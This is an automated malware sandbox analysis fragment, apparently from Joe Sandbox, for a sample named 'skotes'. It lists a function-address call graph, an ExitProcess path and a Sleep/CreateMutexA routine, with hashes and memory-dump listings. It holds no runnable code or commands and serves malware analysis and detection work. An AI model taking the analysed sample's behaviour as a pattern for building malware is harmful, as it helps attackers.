11683 785c10 4 API calls 11682->11683 11684 7866ac 11683->11684 11685 785c10 4 API calls 11684->11685 11686 7866b1 11685->11686 11687 7822c0 4 API calls 11686->11687 11688 7866c9 shared_ptr 11687->11688 11689 797a00 RtlAllocateHeap 11688->11689 11690 786732 11689->11690 11691 785c10 4 API calls 11690->11691 11692 78673d 11691->11692 11693 7822c0 4 API calls 11692->11693 11698 786757 shared_ptr 11693->11698 11694 786852 11695 7980c0 RtlAllocateHeap 11694->11695 11697 78689c 11695->11697 11696 797a00 RtlAllocateHeap 11696->11698 11699 7980c0 RtlAllocateHeap 11697->11699 11698->11694 11698->11696 11700 785c10 4 API calls 11698->11700 11702 7822c0 4 API calls 11698->11702 11701 7868e3 shared_ptr std::invalid_argument::invalid_argument 11699->11701 11700->11698 11702->11698 11746 78215a 11747 79c6fc InitializeCriticalSectionEx 11746->11747 11748 782164 11747->11748 11749 79d64e RtlAllocateHeap 11748->11749 11750 78216e 11749->11750 11751 78a54d 11752 78a555 shared_ptr 11751->11752 11753 78a944 11752->11753 11754 78a628 shared_ptr 11752->11754 11755 7b6c6a RtlAllocateHeap 11753->11755 11759 7980c0 RtlAllocateHeap 11754->11759 11756 78a949 11755->11756 11757 78a94e 11756->11757 11758 7b6c6a RtlAllocateHeap 11756->11758 11761 78a953 Sleep CreateMutexA 11757->11761 11762 7b6c6a RtlAllocateHeap 11757->11762 11758->11757 11760 78a903 11759->11760 11763 78a98e 11761->11763 11762->11761 11816 789f44 11817 789f4c shared_ptr 11816->11817 11818 78a01f shared_ptr 11817->11818 11819 78a92b 11817->11819 11822 7980c0 RtlAllocateHeap 11818->11822 11820 78a953 Sleep CreateMutexA 11819->11820 11821 7b6c6a RtlAllocateHeap 11819->11821 11823 78a98e 11820->11823 11821->11820 11824 78a903 11822->11824 11833 786535 11835 786549 shared_ptr 11833->11835 11834 7b6c6a RtlAllocateHeap 11837 7865dc 11834->11837 11835->11834 11836 7865b1 shared_ptr std::invalid_argument::invalid_argument 11835->11836 11838 797a00 RtlAllocateHeap 11837->11838 11839 7866a6 11838->11839 11840 785c10 4 API calls 11839->11840 11841 7866ac 11840->11841 11842 785c10 4 API calls 11841->11842 11843 7866b1 11842->11843 11844 7822c0 4 API calls 11843->11844 11845 7866c9 shared_ptr 11844->11845 11846 797a00 RtlAllocateHeap 11845->11846 11847 786732 11846->11847 11848 785c10 4 API calls 11847->11848 11849 78673d 11848->11849 11850 7822c0 4 API calls 11849->11850 11859 786757 shared_ptr 11850->11859 11851 786852 11852 7980c0 RtlAllocateHeap 11851->11852 11854 78689c 11852->11854 11853 797a00 RtlAllocateHeap 11853->11859 11855 7980c0 RtlAllocateHeap 11854->11855 11857 7868e3 shared_ptr std::invalid_argument::invalid_argument 11855->11857 11856 785c10 4 API calls 11856->11859 11858 7822c0 4 API calls 11858->11859 11859->11851 11859->11853 11859->11856 11859->11858 11860 7b6729 11863 7b6672 11860->11863 11862 7b673b 11866 7b667e __cftof 11863->11866 11864 7b6685 11865 7b75f6 __dosmaperr RtlAllocateHeap 11864->11865 11867 7b668a 11865->11867 11866->11864 11868 7b66a5 11866->11868 11869 7b6c5a ___std_exception_copy RtlAllocateHeap 11867->11869 11870 7b66aa 11868->11870 11871 7b66b7 11868->11871 11876 7b6695 11869->11876 11873 7b75f6 __dosmaperr RtlAllocateHeap 11870->11873 11877 7ba8c3 11871->11877 11873->11876 11874 7b66c0 11875 7b75f6 __dosmaperr RtlAllocateHeap 11874->11875 11874->11876 11875->11876 11876->11862 11878 7ba8cf __cftof 11877->11878 11881 7ba967 11878->11881 11880 7ba8ea 11880->11874 11886 7ba98a 11881->11886 11882 7ba9d0 11882->11880 11883 7bd82f __dosmaperr RtlAllocateHeap 11884 7ba9eb 11883->11884 11885 7badf5 __freea RtlAllocateHeap 11884->11885 11885->11882 11886->11882 11886->11883 11886->11886 11892 784120 11893 78416a 11892->11893 11895 7841b2 std::invalid_argument::invalid_argument 11893->11895 11896 783ee0 11893->11896 11897 783f48 11896->11897 11899 783f1e 11896->11899 11900 783f58 11897->11900 11902 782c00 11897->11902 11899->11895 11900->11895 11903 79d3e2 RtlAllocateHeap 11902->11903 11904 782c0e 11903->11904 11912 79b847 11904->11912 11906 782c42 11907 782c49 11906->11907 11918 782c80 11906->11918 11907->11895 11909 782c58 11921 782560 11909->11921 11911 782c65 std::_Throw_future_error 11913 79b854 11912->11913 11917 79b873 Concurrency::details::_Reschedule_chore 11912->11917 11924 79cb77 11913->11924 11915 79b864 11915->11917 11926 79b81e 11915->11926 11917->11906 11932 79b7fb 11918->11932 11920 782cb2 shared_ptr 11920->11909 11922 7b38af ___std_exception_copy RtlAllocateHeap 11921->11922 11923 782597 std::invalid_argument::invalid_argument 11922->11923 11923->11911 11925 79cb92 CreateThreadpoolWork 11924->11925 11925->11915 11927 79b827 Concurrency::details::_Reschedule_chore 11926->11927 11930 79cdcc 11927->11930 11929 79b841 11929->11917 11931 79cde1 TpPostWork 11930->11931 11931->11929 11933 79b817 11932->11933 11934 79b807 11932->11934 11933->11920 11934->11933 11936 79ca78 11934->11936 11937 79ca8d TpReleaseWork 11936->11937 11937->11933 11973 798320 11974 798339 11973->11974 11975 79834d 11974->11975 11976 798f40 RtlAllocateHeap 11974->11976 11976->11975 11977 78211c 11978 782126 11977->11978 11979 79d64e RtlAllocateHeap 11978->11979 11980 782132 11979->11980 11981 79d111 11982 79d122 11981->11982 11983 79d12a 11982->11983 11985 79d199 11982->11985 11986 79d1a7 SleepConditionVariableCS 11985->11986 11988 79d1c0 11985->11988 11986->11988 11988->11982 11992 782b10 11993 782b1a 11992->11993 11994 782b1c 11992->11994 11995 79c26a 5 API calls 11994->11995 11996 782b22 11995->11996 11997 798510 11998 79855f 11997->11998 12001 79856c 11997->12001 12003 799d00 11998->12003 12000 7985c4 12001->12000 12024 79a060 12001->12024 12004 799e31 12003->12004 12008 799d25 12003->12008 12005 799270 RtlAllocateHeap 12004->12005 12016 799d8b __cftof 12005->12016 12006 7b6c6a RtlAllocateHeap 12015 799e3b 12006->12015 12007 799e2c 12011 782480 RtlAllocateHeap 12007->12011 12008->12007 12009 799d7a 12008->12009 12010 799da1 12008->12010 12009->12007 12012 799d85 12009->12012 12014 79d3e2 RtlAllocateHeap 12010->12014 12010->12016 12011->12004 12013 79d3e2 RtlAllocateHeap 12012->12013 12013->12016 12014->12016 12017 799e6a shared_ptr 12015->12017 12018 7b6c6a RtlAllocateHeap 12015->12018 12016->12006 12019 799dfc shared_ptr __cftof 12016->12019 12017->12001 12020 799e8e 12018->12020 12019->12001 12021 799ec0 shared_ptr 12020->12021 12022 7b6c6a RtlAllocateHeap 12020->12022 12021->12001 12023 799ee6 12022->12023 12025 79a1b1 12024->12025 12028 79a083 12024->12028 12026 799270 RtlAllocateHeap 12025->12026 12037 79a0e4 __cftof 12026->12037 12027 7b6c6a RtlAllocateHeap 12036 79a1bb shared_ptr 12027->12036 12029 79a1ac 12028->12029 12030 79a0fd 12028->12030 12031 79a0d3 12028->12031 12032 782480 RtlAllocateHeap 12029->12032 12035 79d3e2 RtlAllocateHeap 12030->12035 12030->12037 12031->12029 12033 79a0de 12031->12033 12032->12025 12034 79d3e2 RtlAllocateHeap 12033->12034 12034->12037 12035->12037 12036->12001 12037->12027 12038 79a16c shared_ptr __cftof 12037->12038 12038->12001 12087 7855f0 12088 785610 12087->12088 12089 7822c0 4 API calls 12088->12089 12090 785710 std::invalid_argument::invalid_argument 12088->12090 12089->12088 12091 7843f0 12092 79bedf InitOnceExecuteOnce 12091->12092 12093 78440a 12092->12093 12094 784411 12093->12094 12095 7b6cbb 4 API calls 12093->12095 12096 784424 12095->12096 12137 783fe0 12138 784022 12137->12138 12139 78408c 12138->12139 12140 7840d2 12138->12140 12143 784035 std::invalid_argument::invalid_argument 12138->12143 12144 7835e0 12139->12144 12141 783ee0 4 API calls 12140->12141 12141->12143 12145 79d3e2 RtlAllocateHeap 12144->12145 12146 783616 12145->12146 12150 78364e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 12146->12150 12151 782ce0 12146->12151 12148 78369e 12149 782c00 4 API calls 12148->12149 12148->12150 12149->12150 12150->12143 12152 782d1d 12151->12152 12153 79bedf InitOnceExecuteOnce 12152->12153 12154 782d46 12153->12154 12155 782d51 std::invalid_argument::invalid_argument 12154->12155 12157 782d88 12154->12157 12160 79bef7 12154->12160 12155->12148 12158 782440 4 API calls 12157->12158 12159 782d9b 12158->12159 12159->12148 12161 79bf03 12160->12161 12169 782900 12161->12169 12163 79bf23 std::_Throw_future_error 12164 79bf6a 12163->12164 12165 79bf73 12163->12165 12179 79be7f 12164->12179 12167 782ae0 5 API calls 12165->12167 12168 79bf6f 12167->12168 12168->12157 12170 7980c0 RtlAllocateHeap 12169->12170 12171 78294f 12170->12171 12172 7826b0 RtlAllocateHeap 12171->12172 12174 782967 12172->12174 12173 78298d shared_ptr 12173->12163 12174->12173 12175 7b6c6a RtlAllocateHeap 12174->12175 12176 7829b6 12175->12176 12177 7b38af ___std_exception_copy RtlAllocateHeap 12176->12177 12178 7829e4 12177->12178 12178->12163 12180 79cc31 InitOnceExecuteOnce 12179->12180 12181 79be97 12180->12181 12182 79be9e 12181->12182 12183 7b6cbb 4 API calls 12181->12183 12182->12168 12184 79bea7 12183->12184 12184->12168 12189 798de0 12190 798f2f 12189->12190 12191 798e05 12189->12191 12192 799270 RtlAllocateHeap 12190->12192 12194 798e4c 12191->12194 12195 798e76 12191->12195 12193 798f34 12192->12193 12196 782480 RtlAllocateHeap 12193->12196 12194->12193 12197 798e57 12194->12197 12200 79d3e2 RtlAllocateHeap 12195->12200 12202 798e5d __cftof 12195->12202 12196->12202 12199 79d3e2 RtlAllocateHeap 12197->12199 12198 7b6c6a RtlAllocateHeap 12201 798f3e 12198->12201 12199->12202 12200->12202 12202->12198 12203 798eed shared_ptr __cftof 12202->12203 12204 7887d0 12205 7888d3 12204->12205 12212 788819 shared_ptr 12204->12212 12206 7980c0 RtlAllocateHeap 12205->12206 12213 788923 12206->12213 12207 78896c 12208 798200 RtlAllocateHeap 12207->12208 12211 788971 12208->12211 12209 788949 shared_ptr 12210 7980c0 RtlAllocateHeap 12210->12212 12212->12205 12212->12207 12212->12210 12212->12213 12213->12209 12214 7b6c6a RtlAllocateHeap 12213->12214 12214->12207 12253 7821c0 12254 7821cb 12253->12254 12255 7821d0 12253->12255 12256 7821d4 12255->12256 12260 7821ec __cftof 12255->12260 12257 7b75f6 __dosmaperr RtlAllocateHeap 12256->12257 12258 7821d9 12257->12258 12261 7b6c5a ___std_exception_copy RtlAllocateHeap 12258->12261 12259 7821fc __cftof 12260->12259 12262 78223a 12260->12262 12263 782221 12260->12263 12264 7821e4 12261->12264 12266 782231 12262->12266 12268 7b75f6 __dosmaperr RtlAllocateHeap 12262->12268 12265 7b75f6 __dosmaperr RtlAllocateHeap 12263->12265 12267 782226 12265->12267 12269 7b6c5a ___std_exception_copy RtlAllocateHeap 12267->12269 12270 782247 12268->12270 12269->12266 12271 7b6c5a ___std_exception_copy RtlAllocateHeap 12270->12271 12272 782252 12271->12272 12282 7983c0 12283 797760 RtlAllocateHeap 12282->12283 12284 798439 12283->12284 12285 798f40 RtlAllocateHeap 12284->12285 12286 798454 12284->12286 12285->12286 12287 798f40 RtlAllocateHeap 12286->12287 12289 7984a8 12286->12289 12288 7984ee 12287->12288 12294 7b8bbe 12295 7b8868 4 API calls 12294->12295 12296 7b8bdc 12295->12296 12297 7891b0 12298 7891e5 12297->12298 12298->12298 12299 7980c0 RtlAllocateHeap 12298->12299 12300 789218 std::invalid_argument::invalid_argument 12299->12300 12301 78b7b1 12302 78b7be 12301->12302 12303 797a00 RtlAllocateHeap 12302->12303 12304 78b7f3 12303->12304 12305 797a00 RtlAllocateHeap 12304->12305 12306 78b80b 12305->12306 12307 797a00 RtlAllocateHeap 12306->12307 12308 78b823 12307->12308 12309 797a00 RtlAllocateHeap 12308->12309 12310 78b835 12309->12310 12311 7b67b7 12312 7b67c3 __cftof 12311->12312 12313 7b67cd 12312->12313 12316 7b67e2 12312->12316 12314 7b75f6 __dosmaperr RtlAllocateHeap 12313->12314 12315 7b67d2 12314->12315 12317 7b6c5a ___std_exception_copy RtlAllocateHeap 12315->12317 12319 7b67dd 12316->12319 12320 7b6740 12316->12320 12317->12319 12321 7b674d 12320->12321 12322 7b6762 12320->12322 12323 7b75f6 __dosmaperr RtlAllocateHeap 12321->12323 12334 7b675d 12322->12334 12336 7ba038 12322->12336 12325 7b6752 12323->12325 12326 7b6c5a ___std_exception_copy RtlAllocateHeap 12325->12326 12326->12334 12331 7b6785 12353 7baebb 12331->12353 12334->12319 12335 7badf5 __freea RtlAllocateHeap 12335->12334 12337 7ba050 12336->12337 12341 7b6777 12336->12341 12338 7bafe4 RtlAllocateHeap 12337->12338 12337->12341 12339 7ba06e 12338->12339 12368 7c0439 12339->12368 12342 7bb00b 12341->12342 12343 7bb022 12342->12343 12344 7b677f 12342->12344 12343->12344 12345 7badf5 __freea RtlAllocateHeap 12343->12345 12346 7bafe4 12344->12346 12345->12344 12347 7baff0 12346->12347 12348 7bb005 12346->12348 12349 7b75f6 __dosmaperr RtlAllocateHeap 12347->12349 12348->12331 12350 7baff5 12349->12350 12351 7b6c5a ___std_exception_copy RtlAllocateHeap 12350->12351 12352 7bb000 12351->12352 12352->12331 12354 7baecc 12353->12354 12355 7baee1 12353->12355 12356 7b75e3 __dosmaperr RtlAllocateHeap 12354->12356 12357 7baf2a 12355->12357 12362 7baf08 12355->12362 12359 7baed1 12356->12359 12358 7b75e3 __dosmaperr RtlAllocateHeap 12357->12358 12360 7baf2f 12358->12360 12361 7b75f6 __dosmaperr RtlAllocateHeap 12359->12361 12363 7b75f6 __dosmaperr RtlAllocateHeap 12360->12363 12365 7b678b 12361->12365 12386 7bae2f 12362->12386 12366 7baf37 12363->12366 12365->12334 12365->12335 12367 7b6c5a ___std_exception_copy RtlAllocateHeap 12366->12367 12367->12365 12369 7c0445 __cftof 12368->12369 12370 7c044d 12369->12370 12371 7c0465 12369->12371 12372 7b75e3 __dosmaperr RtlAllocateHeap 12370->12372 12373 7c0500 12371->12373 12380 7c0497 12371->12380 12374 7c0452 12372->12374 12375 7b75e3 __dosmaperr RtlAllocateHeap 12373->12375 12376 7b75f6 __dosmaperr RtlAllocateHeap 12374->12376 12377 7c0505 12375->12377 12385 7c045a 12376->12385 12378 7b75f6 __dosmaperr RtlAllocateHeap 12377->12378 12379 7c050d 12378->12379 12381 7b6c5a ___std_exception_copy RtlAllocateHeap 12379->12381 12382 7b75f6 __dosmaperr RtlAllocateHeap 12380->12382 12380->12385 12381->12385 12383 7c04be 12382->12383 12384 7b75e3 __dosmaperr RtlAllocateHeap 12383->12384 12384->12385 12385->12341 12387 7bae3b __cftof 12386->12387 12388 7bae7b 12387->12388 12389 7bae70 12387->12389 12390 7b75f6 __dosmaperr RtlAllocateHeap 12388->12390 12393 7baf48 12389->12393 12392 7bae76 12390->12392 12392->12365 12404 7bc0de 12393->12404 12395 7baf58 12396 7baf90 12395->12396 12398 7bc0de RtlAllocateHeap 12395->12398 12399 7baf5e 12395->12399 12397 7bc0de RtlAllocateHeap 12396->12397 12396->12399 12397->12399 12401 7baf87 12398->12401 12400 7bafd8 12399->12400 12402 7b75c0 __dosmaperr RtlAllocateHeap 12399->12402 12400->12392 12403 7bc0de RtlAllocateHeap 12401->12403 12402->12400 12403->12396 12405 7bc0eb 12404->12405 12406 7bc100 12404->12406 12407 7b75e3 __dosmaperr RtlAllocateHeap 12405->12407 12408 7b75e3 __dosmaperr RtlAllocateHeap 12406->12408 12410 7bc125 12406->12410 12409 7bc0f0 12407->12409 12411 7bc130 12408->12411 12412 7b75f6 __dosmaperr RtlAllocateHeap 12409->12412 12410->12395 12414 7b75f6 __dosmaperr RtlAllocateHeap 12411->12414 12413 7bc0f8 12412->12413 12413->12395 12415 7bc138 12414->12415 12416 7b6c5a ___std_exception_copy RtlAllocateHeap 12415->12416 12416->12413 12417 786db5 12418 786dc2 12417->12418 12419 786dca 12418->12419 12420 786df5 12418->12420 12421 7980c0 RtlAllocateHeap 12419->12421 12422 7980c0 RtlAllocateHeap 12420->12422 12423 786deb shared_ptr 12421->12423 12422->12423 12424 786ec1 shared_ptr 12423->12424 12425 7b6c6a RtlAllocateHeap 12423->12425 12426 786ee3 12425->12426 12476 789ba5 12477 789ba7 12476->12477 12478 797a00 RtlAllocateHeap 12477->12478 12479 789ca9 12478->12479 12480 785c10 4 API calls 12479->12480 12481 789cb1 12480->12481 12482 788b30 4 API calls 12481->12482 12483 789cc2 12482->12483 12484 798220 RtlAllocateHeap 12483->12484 12485 789cd1 12484->12485 12486 783f9f 12487 783fad 12486->12487 12491 783fc5 12486->12491 12488 782410 5 API calls 12487->12488 12489 783fb6 12488->12489 12490 783ce0 RtlAllocateHeap 12489->12490 12490->12491 12495 782b90 12496 782bce 12495->12496 12497 79b7fb TpReleaseWork 12496->12497 12498 782bdb shared_ptr std::invalid_argument::invalid_argument 12497->12498 12514 788980 12515 788aea 12514->12515 12522 7889d8 shared_ptr 12514->12522 12516 797a00 RtlAllocateHeap 12516->12522 12517 785c10 4 API calls 12517->12522 12518 788b20 12520 798200 RtlAllocateHeap 12518->12520 12519 7980c0 RtlAllocateHeap 12519->12522 12521 788b25 12520->12521 12523 7b6c6a RtlAllocateHeap 12521->12523 12522->12515 12522->12516 12522->12517 12522->12518 12522->12519 12522->12521 12524 788b2a 12523->12524

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 367 7b652b-7b6538 call 7ba302 370 7b655a-7b656c call 7b656d ExitProcess 367->370 371 7b653a-7b6548 GetPEB 367->371 371->370 373 7b654a-7b6559 371->373 373->370
                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(?,?,007B652A,?,?,?,?,?,007B7661), ref: 007B6567
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 621844428-0
                                                                                                                • Opcode ID: 41caf02e8397a7949ddf8c51e54a92423c0e8baf96fbc7c9762eaeb53808d61c
                                                                                                                • Instruction ID: 611c6f72caa13b52f0b36d517ccf0704987085d0b0b2ffaddf4b573ff1476b32
                                                                                                                • Opcode Fuzzy Hash: 41caf02e8397a7949ddf8c51e54a92423c0e8baf96fbc7c9762eaeb53808d61c
                                                                                                                • Instruction Fuzzy Hash: 28E08C30002208BFCE367B18C96DFC93B69EF41745F001821FE5886226CB2DEDA1C680

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 1464230837-3459864372
                                                                                                                • Opcode ID: 3b2116db31d54bd16b8dd3c3eae94179276f8e1f1e99b311ecf16e10b4a8fadb
                                                                                                                • Instruction ID: acdb7ee3ff5784e3454a3f28eddd71ad7523c982143cc8f22245178fda820343
                                                                                                                • Opcode Fuzzy Hash: 3b2116db31d54bd16b8dd3c3eae94179276f8e1f1e99b311ecf16e10b4a8fadb
                                                                                                                • Instruction Fuzzy Hash: 8A316A716442049BFB18BBBCDC8976DBB72EBC5310F24821DE114973D6D73EA9808761

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
